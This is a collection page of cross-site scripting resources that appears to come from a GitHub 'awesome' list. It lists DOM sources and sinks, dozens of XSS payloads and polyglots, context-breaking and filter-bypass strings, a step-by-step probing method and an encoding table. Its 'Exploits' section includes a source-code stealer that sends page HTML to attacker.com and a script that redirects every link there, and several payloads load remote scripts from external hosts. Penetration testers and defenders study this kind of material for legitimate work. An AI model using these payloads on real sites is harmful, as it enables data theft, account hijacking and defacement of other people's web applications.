Home

Awesome

AwesomeXSS

This repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue.

Awesome contents

Awesome Challenges

Awesome Reads & Presentations

Awesome Tools

Awesome XSS Mind Maps

A beautiful XSS mind map by Jack Masa, here

Awesome DOM XSS

Source: An input that could be controlled by an external (untrusted) source.

document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later Only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage

Sink: A potentially dangerous method that could lead to a vulnerability. In this case a DOM Based XSS.

eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location

This comprehensive list of sinks and source is taken from domxsswiki.

Awesome Payloads

<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javas&#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>

Awesome Polyglots

Here's an XSS polyglot that I made which can break out of 20+ contexts:

%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

Explanation of how it works, here

Awesome Tags & Event Handlers

Some less detected event handlers

ontoggle
onauxclick
ondblclick
oncontextmenu
onmouseleave
ontouchcancel

Some HTML Tags that you will be using

img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video

Awesome Context Breaking

HTML Context

Case: <tag>You searched for $input. </tag>

<svg onload=alert()>
</tag><svg onload=alert()>

Attribute Context

Case: <tag attribute="$input">

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()

JavaScript Context

Case: <script> var new something = '$input'; </script>

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>

Awesome Confirm Variants

Yep, confirm because alert is too mainstream.

confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)

Awesome Exploits

Replace all links
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
  i.href = "https://attacker.com";
});
Source Code Stealer
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

Awesome Probing

If nothing of this works, take a look at Awesome Bypassing section

First of all, enter a non-malicious string like d3v and look at the source code to get an idea about number and contexts of reflections. <br>Now for attribute context, check if double quotes (") are being filtered by entering x"d3v. If it gets altered to x&quot;d3v, chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering x'd3v, if it gets altered to x&apos;, you are doomed. The only thing you can try is encoding.<br> If the quotes are not being filtered, you can simply try payloads from Awesome Context Breaking section. <br>For javascript context, check which quotes are being used for example if they are doing

variable = 'value' or variable = "value"

Now lets say single quotes (') are in use, in that case enter x'd3v. If it gets altered to x\'d3v, try escaping the backslash () by adding a backslash to your probe i.e. x\'d3v. If it works use the following payload:

\'-alert()//

But if it gets altered to x\\\'d3v, the only thing you can try is closing the script tag itself by using

</script><svg onload=alert()>

For simple HTML context, the probe is x<d3v. If it gets altered to x&gt;d3v, proper sanitization is in place. If it gets reflected as it as, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is x<xxx>. If it gets stripped or altered in any way, it means the filter is looking for a pair of < and >. It can simply bypassed using

<svg onload=alert()//

or this (it will not work in all cases)

<svg onload=alert()

If the your dummy tags lands in the source code as it is, go for any of these payloads

<svg onload=alert()>
<embed src=//14.rs>
<details open ontoggle=alert()>

Awesome Bypassing

Note: None of these payloads use single (') or double quotes (").

<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>
<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>
<svg onload=confirm()>
<img src=x onerror=confirm()>
<script>confirm()</script>
<svg onload=confirm()//
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
<x onclick=confirm()>click here
<x ondrag=aconfirm()>drag it
</ScRipT>
</script
</script/>
</script x>

Awesome Encoding

HTMLCharNumericDescriptionHexCSS (ISO)JS (Octal)URL
&quot;"&#34;quotation marku+0022\0022\42%22
&num;#&#35;number signu+0023\0023\43%23
&dollar;$&#36;dollar signu+0024\0024\44%24
&percnt;%&#37;percent signu+0025\0025\45%25
&amp;&&#38;ampersandu+0026\0026\46%26
&apos;'&#39;apostropheu+0027\0027\47%27
&lpar;(&#40;left parenthesisu+0028\0028\50%28
&rpar;)&#41;right parenthesisu+0029\0029\51%29
&ast;*&#42;asterisku+002A\002a\52%2A
&plus;+&#43;plus signu+002B\002b\53%2B
&comma;,&#44;commau+002C\002c\54%2C
&minus;-&#45;hyphen-minusu+002D\002d\55%2D
&period;.&#46;full stop; periodu+002E\002e\56%2E
&sol;/&#47;solidus; slashu+002F\002f\57%2F
&colon;:&#58;colonu+003A\003a\72%3A
&semi;;&#59;semicolonu+003B\003b\73%3B
&lt;<&#60;less-thanu+003C\003c\74%3C
&equals;=&#61;equalsu+003D\003d\75%3D
&gt;>&#62;greater-than signu+003E\003e\76%3E
&quest;?&#63;question marku+003F\003f\77%3F
&commat;@&#64;at sign; commercial atu+0040\0040\100%40
&lsqb;[&#91;left square bracketu+005B\005b\133%5B
&bsol;\&#92;backslashu+005C\005c\134%5C
&rsqb;]&#93;right square bracketu+005D\005d\135%5D
&Hat;^&#94;circumflex accentu+005E\005e\136%5E
&lowbar;_&#95;low lineu+005F\005f\137%5F
&grave;`&#96;grave accentu+0060\0060\u0060%60
&lcub;{&#123;left curly bracketu+007b\007b\173%7b
&verbar;|&#124;vertical baru+007c\007c\174%7c
&rcub;}&#125;right curly bracketu+007d\007d\175%7d

Awesome Tips & Tricks

Awesome Credits

All the payloads are crafted by me unless specified.